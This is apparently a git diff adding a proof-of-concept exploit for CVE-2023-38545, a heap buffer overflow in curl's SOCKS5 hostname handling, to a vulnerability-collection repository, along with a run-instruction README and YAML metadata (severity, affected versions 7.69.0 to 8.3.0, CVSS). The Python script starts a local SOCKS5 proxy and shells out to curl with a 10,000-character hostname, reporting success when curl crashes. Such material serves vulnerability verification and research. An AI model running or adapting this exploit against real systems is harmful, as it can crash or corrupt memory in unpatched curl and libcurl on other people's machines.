diff --git a/cve/curl/2023/CVE-2023-38545/CVE-2023-38545.py b/cve/curl/2023/CVE-2023-38545/CVE-2023-38545.py new file mode 100644 index 0000000000000000000000000000000000000000..bf5151e498d2788e5c86fdea2d93cc258a9115b4 --- /dev/null +++ b/cve/curl/2023/CVE-2023-38545/CVE-2023-38545.py @@ -0,0 +1,89 @@ +import socket +import os +import threading +import sys +# chatgpt生成简易的socks服务 +def start_server(host, port): + # 创建监听socket + server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + server_socket.bind((host, port)) + server_socket.listen(1) + #print(f'Socks5 proxy server started on {host}:{port}') + + while True: + # 接受客户端连接 + client_socket, client_address = server_socket.accept() + #print(f'Accepted connection from {client_address[0]}:{client_address[1]}') + + # 处理客户端请求 + data = client_socket.recv(4096) + # 实现Socks5协议的握手过程 + client_socket.send(b'\x05\x00') + data = client_socket.recv(4096) + # 解析客户端请求 + version = data[0] + cmd = data[1] + addrtype = data[3] + if addrtype == 1: + # IPv4地址类型 + dest_addr = socket.inet_ntoa(data[4:8]) + dest_port = int.from_bytes(data[8:10], byteorder='big') + elif addrtype == 3: + # 域名地址类型 + dest_addr_len = data[4] + dest_addr = data[5:5+dest_addr_len] + dest_port = int.from_bytes(data[5+dest_addr_len:7+dest_addr_len], byteorder='big') + else: + # 不支持的地址类型 + client_socket.close() + continue + + # 连接目标服务器 + server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + server_socket.connect((dest_addr, dest_port)) + + # 响应客户端连接成功 + reply = b'\x05\x00\x00\x01' + reply += socket.inet_aton('0.0.0.0') + (port).to_bytes(2, byteorder='big') + client_socket.send(reply) + + # 进行数据转发 + while True: + data = client_socket.recv(4096) + if len(data) == 0: + break + server_socket.sendall(data) + + # 关闭连接 + client_socket.close() + server_socket.close() + +def poc(): + command_parts = [ + "curl", + "--limit-rate", "1025", + "-vvv", + "-x", "socks5h://127.0.0.1:10801", + "$(python3 -c \"print(('A'*10000), end='')\")" + ] + command = " ".join(command_parts) + + # 执行命令 + exit_code = os.system(command) >> 8 + #print(f"命令的退出状态码:{exit_code}") + return exit_code + + + +if __name__ == '__main__': + for _ in range(50): + # 启动服务器的线程 + server_thread = threading.Thread(target=start_server, args=('127.0.0.1', 10801)) + server_thread.start() + sys.stderr = open(os.devnull, 'w') + # 执行 poc + exit_code=poc() + if exit_code==134 or exit_code==139: + print('status:successfully') + sys.exit() + print('status:failed') diff --git a/cve/curl/2023/CVE-2023-38545/README.md b/cve/curl/2023/CVE-2023-38545/README.md new file mode 100644 index 0000000000000000000000000000000000000000..fa461a2488c03c364ff311f6db144f0a28112495 --- /dev/null +++ b/cve/curl/2023/CVE-2023-38545/README.md @@ -0,0 +1,4 @@ +## 漏洞验证 +''' +python3 CVE-2023-38545.py +''' diff --git a/cve/curl/2023/yaml/CVE-2023-38545.yaml b/cve/curl/2023/yaml/CVE-2023-38545.yaml new file mode 100644 index 0000000000000000000000000000000000000000..ff98ff8465b8bae999364693cb7beb31d4c34200 --- /dev/null +++ b/cve/curl/2023/yaml/CVE-2023-38545.yaml @@ -0,0 +1,19 @@ +id: CVE-2023-38545 +source: +info: + name: curl是一款用于从服务器传输数据或向服务器传输数据的工具。 + severity: High + description: | + 当要求curl将主机名传给SOCKS5代理进行地址解析时,若主机名超过255字节,curl将会发生基于堆的缓冲区溢出。由于在缓慢的SOCKS5握手中,一个本地变量可能会产生错误值,导致curl不是复制已解析的地址,而是复制过长的主机名至目标缓冲区。此漏洞同时影响命令行工具curl和依赖库libcurl。 + scope-of-influence: + 7.69.0<=curl<=8.3.0 + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2023-38545 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H + cvss-score: 7.5 + cve-id: CVE-2023-38545 + cwe-id: CWE-787 + cnvd-id: None + kve-id: None + tags: cve2023, 缓冲区溢出 \ No newline at end of file diff --git a/other_list.yaml b/other_list.yaml index 5325a720830bc7d9e96e508120a0ebdf60e51e86..4a67c9713282abc1d78813add131538f08c88494 100644 --- a/other_list.yaml +++ b/other_list.yaml @@ -73,4 +73,6 @@ cve: - CVE-2023-21752 glibc: - CVE-2023-4911 + curl: + - CVE-2023-38545 cnvd: